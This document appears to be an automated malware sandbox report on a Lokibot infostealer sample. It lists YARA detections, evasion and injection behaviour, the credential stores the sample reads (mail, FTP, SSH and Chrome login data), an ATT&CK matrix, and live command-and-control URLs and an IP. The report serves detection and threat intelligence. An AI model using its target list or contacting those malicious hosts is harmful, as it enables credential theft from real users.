          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_0040604C0_2_0040604C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004047720_2_00404772
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0A170_2_021B0A17
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040549C1_2_0040549C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_004029D41_2_004029D4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 00405B6F appears 42 times
          Source: kVijllv0Yl.exe, 00000000.00000003.345017997.000000001B0CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: kVijllv0Yl.exe, 00000000.00000003.345626698.000000001AF36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll 2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
          Source: kVijllv0Yl.exeVirustotal: Detection: 40%
          Source: kVijllv0Yl.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\user\Desktop\kVijllv0Yl.exeJump to behavior
          Source: kVijllv0Yl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe" Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Local\Temp\nsg69F2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@35/2
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dllJump to dropped file
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\kVijllv0Yl.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-3947
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe TID: 4216Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end nodegraph_0-3601
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeAPI call chain: ExitProcess graph end nodegraph_0-3599
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0402 mov eax, dword ptr fs:[00000030h]0_2_021B0402
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0616 mov eax, dword ptr fs:[00000030h]0_2_021B0616
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0706 mov eax, dword ptr fs:[00000030h]0_2_021B0706
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0744 mov eax, dword ptr fs:[00000030h]0_2_021B0744
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B06C7 mov eax, dword ptr fs:[00000030h]0_2_021B06C7
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMemory written: C:\Users\user\Desktop\kVijllv0Yl.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe" Jump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069

          Stealing of Sensitive Information

          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: PopPassword (1_2_0040D069)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, Code function: SmtpPassword (1_2_0040D069)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE

          Remote Access Functionality

          Source: Yara match, File source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 11 Native API | Path Interception | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 Account Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 111 Process Injection | 2 Obfuscated Files or Information | 2 Credentials in Registry | 2 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 5 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Masquerading | NTDS | 11 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 112 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Virtualization/Sandbox Evasion | LSA Secrets | 11 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Source | Detection | Scanner | Label
          kVijllv0Yl.exe | 40% | Virustotal |
          kVijllv0Yl.exe | 48% | ReversingLabs | Win32.Backdoor.Androm
          kVijllv0Yl.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll | 28% | Virustotal |

          Source | Detection | Scanner | Label
          1.0.kVijllv0Yl.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.2.kVijllv0Yl.exe.1ade0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.kVijllv0Yl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.8.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2

          Source | Detection | Scanner | Label
          secure01-redirect.net | 22% | Virustotal |

          Source | Detection | Scanner | Label
          http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
          http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
          http://secure01-redirect.net/gc15/fre.php | 19% | Virustotal |
          http://secure01-redirect.net/gc15/fre.php | 100% | Avira URL Cloud | malware

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          secure01-redirect.net | 185.185.69.76 | true | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
          http://secure01-redirect.net/gc15/fre.php | true | 19%, Virustotal; Avira URL Cloud: malware | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_Error | kVijllv0Yl.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | kVijllv0Yl.exe | false | | high
